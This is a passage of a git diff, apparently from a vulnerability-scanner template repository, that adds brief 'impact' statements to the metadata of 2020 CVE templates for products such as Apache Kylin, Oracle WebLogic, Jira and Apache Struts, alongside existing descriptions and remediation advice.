1.10.11 forward, the default has been changed to deny all requests by default. Note - this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide linked in the references. reference: diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index 4d89be4108..48682e91eb 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication. + impact: | + An attacker can gain sensitive information from the exposed configuration file, potentially leading to further attacks. remediation: | Secure the configuration file by restricting access permissions and implementing proper access controls. reference: diff --git a/http/cves/2020/CVE-2020-13942.yaml b/http/cves/2020/CVE-2020-13942.yaml index 2e073f4233..db7c3800c5 100644 --- a/http/cves/2020/CVE-2020-13942.yaml +++ b/http/cves/2020/CVE-2020-13942.yaml @@ -9,6 +9,8 @@ info: offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process. This vulnerability affects all versions of Apache Unomi prior to 1.5.2. + impact: | + Successful exploitation of this vulnerability can allow an attacker to execute arbitrary code on the affected server. remediation: Apache Unomi users should upgrade to 1.5.2 or later. reference: - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/ diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 573b402eb2..0fe0b85d9a 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. + impact: | + The vulnerability could result in unauthorized access to sensitive information, leading to potential data breaches or unauthorized actions. remediation: | Upgrade to the latest version of Apache APISIX, which includes a fix for the vulnerability. Additionally, ensure that sensitive credentials are properly protected and stored securely. reference: diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml index 309fc4e226..ebb7c7cad3 100644 --- a/http/cves/2020/CVE-2020-14092.yaml +++ b/http/cves/2020/CVE-2020-14092.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Update to the latest version of the WordPress PayPal Pro plugin (1.1.65 or higher) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index 5104f23a7f..7f4a742561 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Gitea 1.1.0 through 1.12.5 is susceptible to authenticated remote code execution, via the git hook functionality, in customer environments where the documentation is not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides." + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Fixed in version 1.16.7. reference: - https://dl.gitea.io/gitea/1.16.6 diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index fd516899d0..deb7504203 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -5,6 +5,8 @@ info: author: x1m_martijn severity: medium description: Atlassian Jira Server and Data Center before 8.5.8 and 8.6.0 through 8.11.1 are susceptible to information disclosure via the /secure/QueryComponent!Default.jspa endpoint. An attacker can view custom field names and custom SLA names. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks. remediation: | Upgrade Atlassian Jira Server/Data Center to a version higher than 8.11.1 to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index 7b10964739..fc6ebd2ad7 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -5,6 +5,8 @@ info: author: bjhulst severity: medium description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the /ViewUserHover.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. Affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0. + impact: | + An attacker can gain access to sensitive information, potentially leading to further attacks. remediation: | Apply the necessary patches or updates provided by Atlassian to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 1ca2d335d1..4196bb5959 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index 0dad2fc4c5..0a3676c129 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: NeDi 1.9C is vulnerable to cross-site scripting because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of NeDi or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index d816692ac2..03e2efaee6 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised machine without entering necessary credentials. See also CVE-2020-14882, which is addressed in the October 2020 Critical Patch Update. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the WebLogic server. remediation: | Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index ac6913782f..1a8fd7cb4f 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -5,6 +5,8 @@ info: author: Ivo Palazzolo (@palaziv) severity: high description: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0, 12.2.1.3.0, and 12.2.1.4.0 are vulnerable to local file inclusion vulnerabilities via "getPreviewImage." + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files, execute arbitrary code, or gain unauthorized access to the system. remediation: | Apply the latest security patches and updates provided by Oracle to fix this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index 1bf1e299b8..fa5fc548a5 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the affected application. remediation: | Apply the latest security patches provided by Oracle to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 814bba4b47..1a67d6ec47 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index 29c3fdd32d..2d0216088f 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Upgrade Suprema BioStar to version 2.8.2 or later to fix the LFI vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index 6a8807160c..656b73bc0b 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: Traefik before 1.7.26, 2.2.8, and 2.3.0-rc3 contains an open redirect vulnerability in the X-Forwarded-Prefix header. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can manipulate the redirect URL and trick users into visiting malicious websites. remediation: | Apply the vendor-provided patch or upgrade to a non-vulnerable version of Traefik. reference: diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 7081184174..47466bc297 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory. reference: - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index 523af36581..b8c0612c56 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -5,6 +5,8 @@ info: author: becivells severity: critical description: Nette Framework versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, and 3.0.6 are vulnerable to a code injection attack via specially formed parameters being passed to a URL. Nette is a PHP/Composer MVC Framework. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by the Nette Framework to fix the deserialization vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index d65405b195..75f6bdf57b 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -5,6 +5,8 @@ info: author: Akash.C severity: medium description: TileServer GL through 3.0.0 is vulnerable to reflected cross-site scripting via server.js because the content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade TileServer GL to a version higher than 3.0.0 or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-15505.yaml b/http/cves/2020/CVE-2020-15505.yaml index 40b56112a3..369c284914 100644 --- a/http/cves/2020/CVE-2020-15505.yaml +++ b/http/cves/2020/CVE-2020-15505.yaml @@ -9,6 +9,8 @@ info: author: dwisiswant0 severity: critical description: A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier contain a vulnerability that allows remote attackers to execute arbitrary code via unspecified vectors. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to complete compromise of the MobileIron infrastructure. remediation: | Upgrade MobileIron Core & Connector and Sentry to versions above v10.6 & v9.8 respectively reference: diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml index 1ec5541c20..4a08fb4c94 100644 --- a/http/cves/2020/CVE-2020-15568.yaml +++ b/http/cves/2020/CVE-2020-15568.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade TerraMaster TOS to version 1.29 or higher to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index bb876fa7dd..5ab7d10c14 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a "product UI does not warn user of unsafe actions" issue. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Gogs to a version that is not affected by the vulnerability (0.12.3 or later). reference: diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index 9c81fb4583..ff2e0ccf4d 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | D-Link DIR-816L devices 2.x before 1.10b04Beta02 contains a cross-site scripting vulnerability. In the file webinc/js/info.php, no output filtration is applied to the RESULT parameter before being printed on the webpage. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow for theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-15920.yaml b/http/cves/2020/CVE-2020-15920.yaml index a2e50b0914..99c2b4af10 100644 --- a/http/cves/2020/CVE-2020-15920.yaml +++ b/http/cves/2020/CVE-2020-15920.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: | Upgrade Mida eFramework to a version higher than 2.9.0 to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml index a536e8c9ad..4ba2f6eb63 100644 --- a/http/cves/2020/CVE-2020-16139.yaml +++ b/http/cves/2020/CVE-2020-16139.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to restart the device remotely via specially crafted packets that can cause a denial-of-service condition. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. + impact: | + An attacker can exploit this vulnerability to disrupt the functionality of the conference station, leading to a denial of service for legitimate users. remediation: | Apply the latest firmware update provided by Cisco to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index 74abe037fc..1b8f8e2775 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ b/http/cves/2020/CVE-2020-16952.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: Microsoft SharePoint is vulnerable to a remote code execution when the software fails to check the source markup of an application package. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to a complete compromise of the SharePoint server. remediation: | Apply the latest security updates provided by Microsoft to address this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index 265447c295..a21d9138f2 100644 --- a/http/cves/2020/CVE-2020-17362.yaml +++ b/http/cves/2020/CVE-2020-17362.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to Nova Lite version 1.3.9 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index 4bf0b83c61..c755de2719 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade to a patched version of WSO2 Carbon Management Console (5.11 or above) or apply the provided security patch to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index 48ffd08882..227c12c79e 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -5,6 +5,8 @@ info: author: gy741,edoardottt severity: critical description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index 823130a149..0cd3fe4307 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: Fixed in version 115 reference: - https://www.exploit-db.com/exploits/48741 diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index 32401aaa7b..19764efa32 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -5,6 +5,8 @@ info: author: pussycat0x severity: critical description: 'vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.' + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system. remediation: | Upgrade vBulletin to a version that is not affected by CVE-2020-17496. reference: diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index 5ae63f48fe..45775cf025 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml index f2772e384e..b4f21662eb 100644 --- a/http/cves/2020/CVE-2020-17506.yaml +++ b/http/cves/2020/CVE-2020-17506.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml index 8ccdfb2ec2..04c261f6e8 100644 --- a/http/cves/2020/CVE-2020-17518.yaml +++ b/http/cves/2020/CVE-2020-17518.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Flink 1.5.1 is vulnerable to local file inclusion because of a REST handler that allows file uploads to an arbitrary location on the local file system through a maliciously modified HTTP HEADER. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Upgrade Apache Flink to a version that is not affected by the vulnerability (1.5.2 or later). reference: diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index c4416221a8..4d58fa9eb2 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized execution of arbitrary code. remediation: Change default value for [webserver] secret_key config. reference: - https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index 74ac02cae8..2d3b72ffde 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Apache Struts 2.0.0 through Struts 2.5.25 is susceptible to remote code execution because forced OGNL evaluation, when evaluated on raw user input in tag attributes, may allow it. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts. reference: diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml index 6a29e60c9e..20294b8446 100644 --- a/http/cves/2020/CVE-2020-18268.yaml +++ b/http/cves/2020/CVE-2020-18268.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks. remediation: | Upgrade Z-Blog to version 1.5.3 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index 1da9daeaed..f3b32f7281 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting that allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Jeesns or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index b4bc6e8dc8..db9181b457 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /newVersion component and allows attackers to execute arbitrary web scripts or HTML. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Jeesns to the latest version or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index 5caf4140db..59b73d754f 100644 --- a/http/cves/2020/CVE-2020-19295.yaml +++ b/http/cves/2020/CVE-2020-19295.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /weibo/topic component and allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade Jeesns to the latest version or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index fe67f8f9bf..55d407ba3d 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: FHEM version 6.0 suffers from a local file inclusion vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system. remediation: | Apply the latest patch or upgrade to a version that is not affected by the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index 09fcc03314..f666b0a2b3 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apache OFBiz 16.11.01 to 16.11.07 is vulnerable to cross-site scripting because data sent with contentId to /control/stream is not sanitized. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Apache OFBiz to a version higher than 16.11.07 to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index 1ea948259b..e5cde90d2a 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index 611ebe8655..99a3eacb6d 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution and potential compromise of the affected server. remediation: | Upgrade to a patched version of Apache Kylin or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml index a6d166a2d1..4c09af3dc0 100644 --- a/http/cves/2020/CVE-2020-19625.yaml +++ b/http/cves/2020/CVE-2020-19625.yaml @@ 